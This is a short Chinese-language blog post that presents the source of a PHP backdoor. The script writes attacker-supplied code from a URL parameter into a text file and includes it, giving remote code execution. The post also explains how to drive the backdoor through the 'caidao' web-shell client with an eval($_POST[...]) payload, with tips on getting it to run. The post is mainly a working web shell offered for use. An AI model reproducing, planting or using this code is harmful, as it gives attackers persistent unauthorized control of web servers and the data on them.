Php backdoor

C0de:

<?php 
/*此作品原理为PHP本地文件包含
 */
if(isset($_GET[pany]))  //只有get过来pany的时候才会执行
{
$fp=fopen('houzi.txt',w);
file_put_contents('houzi.txt',"<?php\r\n");
file_put_contents('houzi.txt',$_GET[pany],FILE_APPEND);
fclose($fp);
require 'houzi.txt';}
?>

假设后门地址为:http://x95.org/1.php

那么在菜刀里填:  http://x95.org/1.php?pany=eval($_POST[#]);

Tips:  $_POST[]内,请勿加单引号。如$_POST[‘sss’],否则有时候后门会无法使用

还有就是在后面有一个分号!

特殊情况:开了gpc的话会转义,导致后门无法执行。

本文链接:

https://x95.org/archives/php-super-backdoor.html
1 + 5 =
快来做第一个评论的人吧~